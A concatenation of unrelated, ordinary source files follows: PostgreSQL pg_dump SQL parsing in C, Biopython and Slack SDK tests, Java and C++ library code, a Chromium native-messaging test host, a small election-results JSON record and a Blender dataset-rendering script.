(AH->sqlparse.state) { case SQL_SCAN: /* Default state == 0, set in _allocAH */ if (*qry == ';' && AH->sqlparse.braceDepth == 0) { /* * We've found the end of a statement. Send it and reset * the buffer. */ appendPQExpBufferChar(AH->sqlBuf, ';'); /* inessential */ ExecuteSqlCommand(AH, AH->sqlBuf->data, "could not execute query"); resetPQExpBuffer(AH->sqlBuf); AH->sqlparse.lastChar = '\0'; /* * Remove any following newlines - so that embedded COPY * commands don't get a starting newline. */ qry++; while (qry < eos && *qry == '\n') qry++; /* We've finished one line, so exit */ return qry; } else if (*qry == '\'') { if (AH->sqlparse.lastChar == 'E') AH->sqlparse.state = SQL_IN_E_QUOTE; else AH->sqlparse.state = SQL_IN_SINGLE_QUOTE; AH->sqlparse.backSlash = false; } else if (*qry == '"') { AH->sqlparse.state = SQL_IN_DOUBLE_QUOTE; } /* * Look for dollar-quotes. We make the assumption that * $-quotes will not have an ident character just before them * in pg_dump output. XXX is this good enough? */ else if (*qry == '$' && !_isIdentChar(AH->sqlparse.lastChar)) { AH->sqlparse.state = SQL_IN_DOLLAR_TAG; /* initialize separate buffer with possible tag */ if (AH->sqlparse.tagBuf == NULL) AH->sqlparse.tagBuf = createPQExpBuffer(); else resetPQExpBuffer(AH->sqlparse.tagBuf); appendPQExpBufferChar(AH->sqlparse.tagBuf, *qry); } else if (*qry == '-' && AH->sqlparse.lastChar == '-') AH->sqlparse.state = SQL_IN_SQL_COMMENT; else if (*qry == '*' && AH->sqlparse.lastChar == '/') AH->sqlparse.state = SQL_IN_EXT_COMMENT; else if (*qry == '(') AH->sqlparse.braceDepth++; else if (*qry == ')') AH->sqlparse.braceDepth--; break; case SQL_IN_SQL_COMMENT: if (*qry == '\n') AH->sqlparse.state = SQL_SCAN; break; case SQL_IN_EXT_COMMENT: /* * This isn't fully correct, because we don't account for * nested slash-stars, but pg_dump never emits such. */ if (AH->sqlparse.lastChar == '*' && *qry == '/') AH->sqlparse.state = SQL_SCAN; break; case SQL_IN_SINGLE_QUOTE: /* We needn't handle '' specially */ if (*qry == '\'' && !AH->sqlparse.backSlash) AH->sqlparse.state = SQL_SCAN; else if (*qry == '\\') AH->sqlparse.backSlash = !AH->sqlparse.backSlash; else AH->sqlparse.backSlash = false; break; case SQL_IN_E_QUOTE: /* * Eventually we will need to handle '' specially, because * after E'...''... we should still be in E_QUOTE state. * * XXX problem: how do we tell whether the dump was made by a * version that thinks backslashes aren't special in non-E * literals?? */ if (*qry == '\'' && !AH->sqlparse.backSlash) AH->sqlparse.state = SQL_SCAN; else if (*qry == '\\') AH->sqlparse.backSlash = !AH->sqlparse.backSlash; else AH->sqlparse.backSlash = false; break; case SQL_IN_DOUBLE_QUOTE: /* We needn't handle "" specially */ if (*qry == '"') AH->sqlparse.state = SQL_SCAN; break; case SQL_IN_DOLLAR_TAG: if (*qry == '$') { /* Do not add the closing $ to tagBuf */ AH->sqlparse.state = SQL_IN_DOLLAR_QUOTE; AH->sqlparse.minTagEndPos = AH->sqlBuf->len + AH->sqlparse.tagBuf->len + 1; } else if (_isDQChar(*qry, (AH->sqlparse.tagBuf->len == 1))) { /* Valid, so add to tag */ appendPQExpBufferChar(AH->sqlparse.tagBuf, *qry); } else { /* * Ooops, we're not really in a dollar-tag. Valid tag * chars do not include the various chars we look for in * this state machine, so it's safe to just jump from this * state back to SCAN. We have to back up the qry pointer * so that the current character gets rescanned in SCAN * state; and then "continue" so that the bottom-of-loop * actions aren't done yet. */ AH->sqlparse.state = SQL_SCAN; qry--; continue; } break; case SQL_IN_DOLLAR_QUOTE: /* * If we are at a $, see whether what precedes it matches * tagBuf. (Remember that the trailing $ of the tag was not * added to tagBuf.) However, don't compare until we have * enough data to be a possible match --- this is needed to * avoid false match on '$a$a$...' */ if (*qry == '$' && AH->sqlBuf->len >= AH->sqlparse.minTagEndPos && strcmp(AH->sqlparse.tagBuf->data, AH->sqlBuf->data + AH->sqlBuf->len - AH->sqlparse.tagBuf->len) == 0) AH->sqlparse.state = SQL_SCAN; break; } appendPQExpBufferChar(AH->sqlBuf, *qry); AH->sqlparse.lastChar = *qry; } /* * If we get here, we've processed entire bufferload with no complete SQL * stmt */ return eos; } /* Convenience function to send one or more queries. Monitors result to handle COPY statements */ int ExecuteSqlCommandBuf(ArchiveHandle *AH, void *qryv, size_t bufLen) { char *qry = (char *) qryv; char *eos = qry + bufLen; /* * fprintf(stderr, "\n\n*****\n Buffer:\n\n%s\n*******************\n\n", * qry); */ /* Could switch between command and COPY IN mode at each line */ while (qry < eos) { /* * If libpq is in CopyIn mode *or* if the archive structure shows we * are sending COPY data, treat the data as COPY data. The pgCopyIn * check is only needed for backwards compatibility with ancient * archive files that might just issue a COPY command without marking * it properly. Note that in an archive entry that has a copyStmt, * all data up to the end of the entry will go to _sendCopyLine, and * therefore will be dropped if libpq has failed to enter COPY mode. * Also, if a "\." data terminator is found, anything remaining in the * archive entry will be dropped. */ if (AH->pgCopyIn || AH->writingCopyData) qry = _sendCopyLine(AH, qry, eos); else qry = _sendSQLLine(AH, qry, eos); } return 1; } void StartTransaction(ArchiveHandle *AH) { ExecuteSqlCommand(AH, "BEGIN", "could not start database transaction"); } void CommitTransaction(ArchiveHandle *AH) { ExecuteSqlCommand(AH, "COMMIT", "could not commit database transaction"); } static bool _isIdentChar(unsigned char c) { if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || (c == '_') || (c == '$') || (c >= (unsigned char) '\200') /* no need to check <= \377 */ ) return true; else return false; } static bool _isDQChar(unsigned char c, bool atStart) { if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c == '_') || (!atStart && c >= '0' && c <= '9') || (c >= (unsigned char) '\200') /* no need to check <= \377 */ ) return true; else return false; }
7,866
2,856
# Copyright 2020 <NAME>. All rights reserved. # # This file is part of the Biopython distribution and governed by your # choice of the "Biopython License Agreement" or the "BSD 3-Clause License". # Please see the LICENSE file that should have been included as part of this # package. """Unit tests for the Bio.PDB.SASA module: Surface Accessibility Calculations.""" import copy import pathlib import unittest import warnings from Bio.PDB import PDBParser from Bio.PDB.SASA import ShrakeRupley DATADIR = pathlib.Path(__file__).parent / "PDB" class TestShrakeRupley(unittest.TestCase): """Tests for SR algorithm.""" # Expected values obtained with freesasa 2.0.3 and custom config file. # e.g. cmd: --shrake-rupley --resolution 100 -n-threads 1 --probe-radius 1.4 @classmethod def setUpClass(cls): """One-time setup for all tests.""" cls.parser = p = PDBParser(QUIET=1) with warnings.catch_warnings(): structure = p.get_structure("X", DATADIR / "1LCD.pdb") model = structure[0] # Remove HETATM and Hs for simplicity/speed for r in list(model.get_residues()): if r.id[0] == " ": for a in list(r): if a.element == "H": r.detach_child(a.name) else: c = r.parent c.detach_child(r.id) cls.model = model # General Parameters def test_default_algorithm(self): """Run Shrake-Rupley with default parameters.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley() sasa.compute(m) result = [a.sasa for a in m.get_atoms()][:5] expected = [50.36, 31.40, 10.87, 12.86, 2.42] for a, b in zip(result, expected): self.assertAlmostEqual(a, b, places=2) def test_higher_resolution(self): """Run Shrake-Rupley with 960 points per sphere.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley(n_points=960) sasa.compute(m) result = [a.sasa for a in m.get_atoms()][:5] expected = [51.90, 31.45, 12.45, 12.72, 3.02] for a, b in zip(result, expected): self.assertAlmostEqual(a, b, places=2) def test_custom_radii(self): """Run Shrake-Rupley with custom radii.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley(radii_dict={"C": 5.00}) sasa.compute(m) result = [a.sasa for a in m.get_atoms()][:5] expected = [0.0, 190.45, 41.18, 0.0, 36.03] for a, b in zip(result, expected): self.assertAlmostEqual(a, b, places=2) # Compute parameters def test_level_R(self): """Run Shrake-Rupley with level R.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley() sasa.compute(m, level="R") for r in m.get_residues(): atom_sum = sum(a.sasa for a in r) self.assertAlmostEqual(atom_sum, r.sasa, places=2) def test_level_C(self): """Run Shrake-Rupley with level C.""" m = copy.deepcopy(self.model) # modifies atom.sasa sasa = ShrakeRupley() sasa.compute(m, level="C") for c in m.get_chains(): atom_sum = sum(a.sasa for a in c.get_atoms()) self.assertAlmostEqual(atom_sum, c.sasa, places=2) # Exceptions def test_fail_probe_radius(self): """Raise exception on bad probe_radius parameter.""" with self.assertRaisesRegex(ValueError, "must be a positive number"): sasa = ShrakeRupley(probe_radius=-1.40) def test_fail_n_points(self): """Raise exception on bad n_points parameter.""" with self.assertRaisesRegex(ValueError, "must be larger than 1"): sasa = ShrakeRupley(n_points=0) def test_fail_compute_entity_type(self): """Raise exception on unsupported entity type.""" with self.assertRaisesRegex(ValueError, "Invalid entity type"): sasa = ShrakeRupley() sasa.compute([1, 2, 3, 4, 5]) def test_fail_compute_entity_level(self): """Raise exception on input Atom entity.""" atom = list(self.model.get_atoms())[0] with self.assertRaisesRegex(ValueError, "Invalid entity type"): sasa = ShrakeRupley() sasa.compute(atom) def test_fail_compute_level_1(self): """Raise exception on invalid level parameter: X.""" with self.assertRaisesRegex(ValueError, "Invalid level"): sasa = ShrakeRupley() sasa.compute(self.model, level="X") def test_fail_compute_level_2(self): """Raise exception on invalid level parameter: S > C.""" chain = self.model["A"] with self.assertRaisesRegex(ValueError, "be equal or smaller than"): sasa = ShrakeRupley() sasa.compute(chain, level="S") # Chain is a child of Structure. def test_fail_empty_entity(self): """Raise exception on invalid level parameter: S > C.""" sasa = ShrakeRupley() r = copy.deepcopy(self.model["A"].child_list[0]) for a in list(r): r.detach_child(a.name) # empty residue self.assertEqual(len(r.child_list), 0) with self.assertRaisesRegex(ValueError, "Entity has no child atoms"): sasa.compute(r) if __name__ == "__main__": runner = unittest.TextTestRunner(verbosity=2) unittest.main(testRunner=runner)
2,559
348
{"nom":"Champigneulles-en-Bassigny","dpt":"Haute-Marne","inscrits":44,"abs":11,"votants":33,"blancs":4,"nuls":0,"exp":29,"res":[{"panneau":"1","voix":21},{"panneau":"2","voix":8}]}
78
2,486
import logging import os import unittest import pytest from integration_tests.env_variable_names import ( SLACK_SDK_TEST_GRID_ORG_ADMIN_USER_TOKEN, ) from integration_tests.helpers import async_test, is_not_specified from slack_sdk.http_retry import RateLimitErrorRetryHandler from slack_sdk.http_retry.builtin_async_handlers import AsyncRateLimitErrorRetryHandler from slack_sdk.web import WebClient from slack_sdk.web.async_client import AsyncWebClient class TestWebClient(unittest.TestCase): """Runs integration tests with real Slack API""" def setUp(self): self.logger = logging.getLogger(__name__) self.org_admin_token = os.environ[SLACK_SDK_TEST_GRID_ORG_ADMIN_USER_TOKEN] self.sync_client: WebClient = WebClient(token=self.org_admin_token) self.sync_client.retry_handlers.append( RateLimitErrorRetryHandler(max_retry_count=2) ) self.async_client: AsyncWebClient = AsyncWebClient(token=self.org_admin_token) self.async_client.retry_handlers.append( AsyncRateLimitErrorRetryHandler(max_retry_count=2) ) def tearDown(self): pass @pytest.mark.skipif(condition=is_not_specified(), reason="execution can take long") def test_sync(self): client = self.sync_client for response in client.admin_users_session_list(limit=1): self.assertIsNotNone(response.get("active_sessions")) @pytest.mark.skipif(condition=is_not_specified(), reason="execution can take long") @async_test async def test_async(self): client = self.async_client async for response in await client.admin_users_session_list(limit=1): self.assertIsNotNone(response.get("active_sessions"))
693
1,213
import pytest pytest.importorskip("channels")
17
314
package com.ys.yoosir.zzshow.di.component; import com.ys.yoosir.zzshow.di.module.VideoListModule; import com.ys.yoosir.zzshow.di.scope.FragmentScope; import com.ys.yoosir.zzshow.mvp.ui.fragments.VideoListFragment; import dagger.Component; /** * @version 1.1.0 * @author yoosir * Created by Administrator on 2016/12/29 0029. */ @FragmentScope @Component(modules = VideoListModule.class,dependencies = AppComponent.class) public interface VideoListComponent { void inject(VideoListFragment fragment); }
187
1,367
package com.wanjian.sak.proxy; import android.support.annotation.NonNull; import java.lang.reflect.Method; import java.util.ArrayList; import java.util.Collection; import java.util.Iterator; import java.util.List; import java.util.ListIterator; public class ProxyArrayList<E> extends ArrayList<E> { private ArrayList origin; private Method removeRangeMethod; public ProxyArrayList(ArrayList origin) { super(); this.origin = origin; if (origin == null) { throw new IllegalArgumentException("origin can not be null!"); } } @Override public boolean add(E object) { return origin.add(object); } @Override public void add(int index, E object) { origin.add(index, object); } @Override public boolean addAll(Collection<? extends E> collection) { return origin.addAll(collection); } @Override public boolean addAll(int index, Collection<? extends E> collection) { return origin.addAll(index, collection); } @Override public void clear() { origin.clear(); } @Override public Object clone() { return origin.clone(); } @Override public void ensureCapacity(int minimumCapacity) { origin.ensureCapacity(minimumCapacity); } @Override public E get(int index) { return (E) origin.get(index); } @Override public int size() { return origin.size(); } @Override public boolean isEmpty() { return origin.isEmpty(); } @Override public boolean contains(Object object) { return origin.contains(object); } @Override public int indexOf(Object object) { return origin.indexOf(object); } @Override public int lastIndexOf(Object object) { return origin.lastIndexOf(object); } @Override public E remove(int index) { return (E) origin.remove(index); } @Override public boolean remove(Object object) { return origin.remove(object); } @Override public E set(int index, E object) { return (E) origin.set(index, object); } @Override public Object[] toArray() { return origin.toArray(); } @Override public <T> T[] toArray(T[] contents) { return (T[]) origin.toArray(contents); } @Override public void trimToSize() { origin.trimToSize(); } @NonNull @Override public Iterator<E> iterator() { return origin.iterator(); } @Override public int hashCode() { return origin.hashCode(); } @Override public boolean equals(Object o) { return origin.equals(o); } @Override public ListIterator<E> listIterator() { return origin.listIterator(); } @Override public ListIterator<E> listIterator(int location) { return origin.listIterator(location); } @Override public List<E> subList(int start, int end) { return origin.subList(start, end); } @Override public boolean containsAll(Collection<?> collection) { return origin.containsAll(collection); } @Override public boolean removeAll(Collection<?> collection) { return origin.removeAll(collection); } @Override public boolean retainAll(Collection<?> collection) { return origin.retainAll(collection); } @Override public String toString() { return origin.toString(); } @Override protected void removeRange(int fromIndex, int toIndex) { if (removeRangeMethod == null) { try { removeRangeMethod = ArrayList.class.getDeclaredMethod("removeRange", int.class, int.class); } catch (NoSuchMethodException e) { throw new RuntimeException(e); } } try { removeRangeMethod.invoke(origin, fromIndex, toIndex); } catch (Exception e) { throw new RuntimeException(e); } } }
1,632
679
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef SC_XESTRING_HXX #define SC_XESTRING_HXX #include "xlstring.hxx" // ============================================================================ class ScEditCell; class ScPatternAttr; class EditTextObject; class XclExpStream; class XclExpXmlStream; /** This class stores an unformatted or formatted string for Excel export. The class supports two completely different types of Excel strings: 1) BIFF2-BIFF7 byte strings: The text is encoded as a 8-bit character array. The strings cannot contain any character formatting. 2) BIFF8 Unicode strings: The text may be stored as UCS-2 character array, or compressed to an 8-bit array, if all characters are less than U+0100. Unicode strings may contain a formatting array, that specifies the used FONT record for different ranges of characters. The class provides full support for NUL characters in strings. On construction or assignment the passed flags specify the behaviour of the string while it is written to a stream (the 'Write' functions and 'operator<<'). */ class XclExpString { public: // constructors ----------------------------------------------------------- /** Constructs an empty BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ explicit XclExpString( XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Constructs an unformatted BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ explicit XclExpString( const String& rString, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Constructs an unformatted BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ explicit XclExpString( const ::rtl::OUString& rString, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); //UNUSED2008-05 /** Constructs a formatted BIFF8 Unicode string. //UNUSED2008-05 @param rFormats The formatting runs. //UNUSED2008-05 @param nFlags Modifiers for string export. //UNUSED2008-05 @param nMaxLen The maximum number of characters to store in this string. */ //UNUSED2008-05 explicit XclExpString( //UNUSED2008-05 const String& rString, //UNUSED2008-05 const XclFormatRunVec& rFormats, //UNUSED2008-05 XclStrFlags nFlags = EXC_STR_DEFAULT, //UNUSED2008-05 sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); //UNUSED2008-05 //UNUSED2008-05 /** Constructs a formatted BIFF8 Unicode string. //UNUSED2008-05 @param rFormats The formatting runs. //UNUSED2008-05 @param nFlags Modifiers for string export. //UNUSED2008-05 @param nMaxLen The maximum number of characters to store in this string. */ //UNUSED2008-05 explicit XclExpString( //UNUSED2008-05 const ::rtl::OUString& rString, //UNUSED2008-05 const XclFormatRunVec& rFormats, //UNUSED2008-05 XclStrFlags nFlags = EXC_STR_DEFAULT, //UNUSED2008-05 sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); // assign ----------------------------------------------------------------- /** Assigns an unformatted string, converts this object to a BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void Assign( const String& rString, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns a formatted string, converts this object to a BIFF8 Unicode string. @param rFormats The formatting runs. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void Assign( const String& rString, const XclFormatRunVec& rFormats, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns an unformatted string, converts this object to a BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void Assign( const ::rtl::OUString& rString, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns a formatted string, converts this object to a BIFF8 Unicode string. @param rFormats The formatting runs. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void Assign( const ::rtl::OUString& rString, const XclFormatRunVec& rFormats, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns a Unicode character, converts this object to a BIFF8 Unicode string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string (for appending). */ void Assign( sal_Unicode cChar, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); /** Assigns an unformatted string, converts this object to a BIFF2-BIFF7 byte string. @param nFlags Modifiers for string export. @param nMaxLen The maximum number of characters to store in this string. */ void AssignByte( const String& rString, rtl_TextEncoding eTextEnc, XclStrFlags nFlags = EXC_STR_DEFAULT, sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); //UNUSED2008-05 /** Assigns a character, converts this object to a BIFF2-BIFF7 byte string. //UNUSED2008-05 @param nFlags Modifiers for string export. //UNUSED2008-05 @param nMaxLen The maximum number of characters to store in this string (for appending). */ //UNUSED2008-05 void AssignByte( //UNUSED2008-05 sal_Unicode cChar, //UNUSED2008-05 rtl_TextEncoding eTextEnc, //UNUSED2008-05 XclStrFlags nFlags = EXC_STR_DEFAULT, //UNUSED2008-05 sal_uInt16 nMaxLen = EXC_STR_MAXLEN ); // append ----------------------------------------------------------------- /** Appends a string. Uses the string flags used in constructor or last Assign(). @descr This object must be a BIFF8 Unicode string. */ void Append( const String& rString ); //UNUSED2008-05 /** Appends a string. Uses the string flags used in constructor or last Assign(). //UNUSED2008-05 @descr This object must be a BIFF8 Unicode string. */ //UNUSED2008-05 void Append( const ::rtl::OUString& rString ); //UNUSED2008-05 /** Appends a character. Uses the string flags used in constructor or last Assign(). //UNUSED2008-05 @descr This object must be a BIFF8 Unicode string. */ //UNUSED2008-05 void Append( sal_Unicode cChar ); /** Appends a string. Uses the string flags used in constructor or last Assign(). @descr This object must be a BIFF2-BIFF7 byte string. */ void AppendByte( const String& rString, rtl_TextEncoding eTextEnc ); /** Appends a character. Uses the string flags used in constructor or last Assign(). @descr This object must be a BIFF2-BIFF7 byte string. */ void AppendByte( sal_Unicode cChar, rtl_TextEncoding eTextEnc ); // formatting runs -------------------------------------------------------- /** Sets new formatting runs for the current text. */ void SetFormats( const XclFormatRunVec& rFormats ); /** Appends a formatting run. nChar must be greater than last contained character index. */ void AppendFormat( sal_uInt16 nChar, sal_uInt16 nFontIdx, bool bDropDuplicate = true ); /** Appends a trailing formatting run with the passed font index. */ void AppendTrailingFormat( sal_uInt16 nFontIdx ); /** Removes formatting runs at the end, if the string contains too much. */ void LimitFormatCount( sal_uInt16 nMaxCount ); /** Removes and returns the font index for the first char from the formatting runs, otherwise EXC_FONT_NOTFOUND. */ sal_uInt16 RemoveLeadingFont(); // get data --------------------------------------------------------------- /** Returns the character count of the string. */ inline sal_uInt16 Len() const { return mnLen; } /** Returns true, if the string is empty. */ inline bool IsEmpty() const { return mnLen == 0; } /** Returns true, if the string contains line breaks. */ inline bool IsWrapped() const { return mbWrapped; } /** Returns true, if this string is equal to the passed string. */ bool IsEqual( const XclExpString& rCmp ) const; /** Returns true, if this string is less than the passed string. */ bool IsLessThan( const XclExpString& rCmp ) const; /** Returns true, if the string contains formatting information. */ inline bool IsRich() const { return !maFormats.empty(); } /** Returns the current count of formatting runs for rich strings. */ sal_uInt16 GetFormatsCount() const; /** Returns the vector with all formatting runs. */ inline const XclFormatRunVec& GetFormats() const { return maFormats; } /** Returns the current string flags field to export. */ sal_uInt8 GetFlagField() const; /** Returns the byte count the header will take on export. */ sal_uInt16 GetHeaderSize() const; /** Returns the byte count the character buffer will take on export. */ sal_Size GetBufferSize() const; /** Returns the byte count the whole string will take on export. */ sal_Size GetSize() const; /** Returns the specified character from the (already encoded) string. */ sal_uInt16 GetChar( sal_uInt16 nCharIdx ) const; /** Returns a hash value for the string. */ sal_uInt16 GetHash() const; const ScfUInt16Vec& GetUnicodeBuffer() const { return maUniBuffer; } // streaming -------------------------------------------------------------- /** Writes the string length field (1 byte or 2 bytes). */ void WriteLenField( XclExpStream& rStrm ) const; /** Writes the string flags field (1 byte). */ void WriteFlagField( XclExpStream& rStrm ) const; /** Writes 8-bit or 16-bit length field and string flags field. */ void WriteHeader( XclExpStream& rStrm ) const; /** Writes the raw character buffer. */ void WriteBuffer( XclExpStream& rStrm ) const; /** Writes the raw formatting run buffer. */ void WriteFormats( XclExpStream& rStrm, bool bWriteSize = false ) const; /** Writes the complete Unicode string. */ void Write( XclExpStream& rStrm ) const; /** Writes the string header to memory. */ void WriteHeaderToMem( sal_uInt8* pnMem ) const; /** Writes the raw character buffer to memory (8-bit or 16-bit little-endian). */ void WriteBufferToMem( sal_uInt8* pnMem ) const; /** Writes the entire string to memory. */ void WriteToMem( sal_uInt8* pnMem ) const; void WriteXml( XclExpXmlStream& rStrm ) const; // ------------------------------------------------------------------------ private: /** Returns true, if the flag field should be written. */ bool IsWriteFlags() const; /** Returns true, if the formatting run vector should be written. */ bool IsWriteFormats() const; /** Sets the string length but regards the limit given in mnMaxLen. */ void SetStrLen( sal_Int32 nNewLen ); /** Inserts the passed character array into the internal character buffer. @param nBegin First index in internal buffer to fill. @param nLen Number of characters to insert. */ void CharsToBuffer( const sal_Unicode* pcSource, sal_Int32 nBegin, sal_Int32 nLen ); /** Inserts the passed character array into the internal character buffer. @param nBegin First index in internal buffer to fill. @param nLen Number of characters to insert. */ void CharsToBuffer( const sal_Char* pcSource, sal_Int32 nBegin, sal_Int32 nLen ); /** Initializes flags, string length, and resizes character buffer. @param nFlags Modifiers for string export. @param nCurrLen The requested number of characters for the string. @param nMaxLen The maximum length allowed of the resulting string. @param bBiff8 true = BIFF8 Unicode string; false = BIFF2-BIFF7 byte string. */ void Init( sal_Int32 nCurrLen, XclStrFlags nFlags, sal_uInt16 nMaxLen, bool bBiff8 ); /** Creates the character buffer from the given Unicode array. @param pcSource The source character buffer. Trailing NUL character is not necessary. @param nFlags Modifiers for string export. @param nCurrLen The real count of characters contained in the passed buffer. @param nMaxLen The maximum length allowed of the resulting string. */ void Build( const sal_Unicode* pcSource, sal_Int32 nCurrLen, XclStrFlags nFlags, sal_uInt16 nMaxLen ); /** Creates the character buffer from the given character array. @param pcSource The source character buffer. Trailing NUL character is not necessary. @param nFlags Modifiers for string export. @param nCurrLen The real count of characters contained in the passed buffer. @param nMaxLen The maximum length allowed of the resulting string. */ void Build( const sal_Char* pcSource, sal_Int32 nCurrLen, XclStrFlags nFlags, sal_uInt16 nMaxLen ); /** Initializes string length and resizes character buffers for appending operation. @param nAddLen The number of characters to be appended. */ void InitAppend( sal_Int32 nAddLen ); /** Appends the given Unicode array to the character buffer. @param pcSource The source character buffer. Trailing NUL character is not necessary. @param nAddLen The real count of characters contained in the passed buffer. */ void BuildAppend( const sal_Unicode* pcSource, sal_Int32 nAddLen ); /** Appends the given character array to the character buffer. @param pcSource The source character buffer. Trailing NUL character is not necessary. @param nAddLen The real count of characters contained in the passed buffer. */ void BuildAppend( const sal_Char* pcSource, sal_Int32 nAddLen ); /** Initializes write process on stream. */ void PrepareWrite( XclExpStream& rStrm, sal_uInt16 nBytes ) const; private: ScfUInt16Vec maUniBuffer; /// The Unicode character buffer. ScfUInt8Vec maCharBuffer; /// The byte character buffer. XclFormatRunVec maFormats; /// All formatting runs. sal_uInt16 mnLen; /// Character count to export. sal_uInt16 mnMaxLen; /// Maximum allowed number of characters. bool mbIsBiff8; /// true = BIFF8 Unicode string, false = BIFF2-7 bytestring. bool mbIsUnicode; /// true, if at least one character is >0xFF. bool mb8BitLen; /// true = write 8-bit string length; false = 16-bit. bool mbSmartFlags; /// true = omit flags on empty string; false = always write flags. bool mbSkipFormats; /// true = skip formats on export; false = write complete formatted string. bool mbWrapped; /// true = text contains several paragraphs. bool mbSkipHeader; /// ture = skip length and flags when writing string bytes. }; inline bool operator==( const XclExpString& rLeft, const XclExpString& rRight ) { return rLeft.IsEqual( rRight ); } inline bool operator!=( const XclExpString& rLeft, const XclExpString& rRight ) { return !(rLeft == rRight); } inline bool operator<( const XclExpString& rLeft, const XclExpString& rRight ) { return rLeft.IsLessThan( rRight ); } inline XclExpStream& operator<<( XclExpStream& rStrm, const XclExpString& rString ) { rString.Write( rStrm ); return rStrm; } // ============================================================================ #endif
7,458
14,668
<filename>chrome/test/data/native_messaging/native_hosts/empty_app.py #!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # This native client will read full messages, but do nothing with them and # send no responses. import sys import struct while 1: # Read the message type (first 4 bytes). typeBytes = sys.stdin.read(4) if len(typeBytes) == 0: break # Read the message length (4 bytes). textLength = struct.unpack('i', sys.stdin.read(4))[0] # Read the text (JSON object) of the message. text = sys.stdin.read(textLength)
218
383
import os from os.path import join, realpath, exists import pandas as pd import numpy as np from tqdm import tqdm import json import argparse import sys sys.path.append('../..') from blender_render.render_random_pose import RenderMachine parser = argparse.ArgumentParser() parser.add_argument('--dataset_dir', type=str, help='dataset directory') parser.add_argument('--input', type=str, help='subdirectory containing obj files in the dataset directory') parser.add_argument('--output', type=str, help='subdirectory to save the generated data in the dataset directory') parser.add_argument('--csv', type=str, help='csv file containing dataset information') parser.add_argument('--bg_dir', type=str, default='/home/xiao/Datasets/PascalVOC/VOCdevkit/VOC2012/Images/JPEGImages', help='directory containing the background images') parser.add_argument('--images_per_scene', type=int, default=100, help='images generated for each scene') parser.add_argument('--scenes', type=int, default=100, help='number of scenes to generate') args = parser.parse_args() # set related directories model_dir = join(args.dataset_dir, args.input) out_dir = join(args.dataset_dir, args.output) root_dir = realpath('../..') texture_dir = join(root_dir, 'blender_render', 'textures') table_file = join(root_dir, 'blender_render', 'Platte.obj') table_poses = np.load(join(root_dir, 'blender_render', 'table_poses.npz')) R, T, Ele = table_poses['R'], table_poses['T'], table_poses['Ele'] # read dataset statistics and select the appropriate models df = pd.read_csv(join(args.dataset_dir, args.csv)) df = df[df.file_size <= 10] df = df[df.ratio_max <= 5] df = df[df.ratio_min >= 0.2] df = df[df.occupy_min >= 0.1] # create the final csv file containing all the annotations outfile = join(args.dataset_dir, '{}.txt'.format(args.output)) frames = [] for scene_id in range(args.scenes): scene_out = join(out_dir, '{:06d}'.format(scene_id)) scene_file = join(scene_out, 'scene_gt.json') if not exists(scene_file): # Create one render machine for each scene model_idx = np.random.randint(0, len(df), size=(np.random.randint(5, 25),)) model_files = [join(model_dir, '{}.obj'.format(df.iloc[i, 0])) for i in model_idx] render_machine = RenderMachine(model_files, scene_out, table_file=table_file, texture_dir=texture_dir, bg_dir=args.bg_dir, rad=3000) scene_annot = {} pose_idx = np.random.randint(0, R.shape[0], size=(args.images_per_scene,)) for i in range(args.images_per_scene): start_idx = len(scene_annot) render_machine.render_random_pose(scene_annot, start_idx, scene_id, i, R[pose_idx[i], :], T[pose_idx[i], :], Ele[pose_idx[i]]) with open(scene_file, 'w') as f: json.dump(scene_annot, f, indent=4) scene_df = pd.read_json(scene_file, orient='index') frames.append(scene_df) result = pd.concat(frames) result.to_csv(outfile)
1,162
333
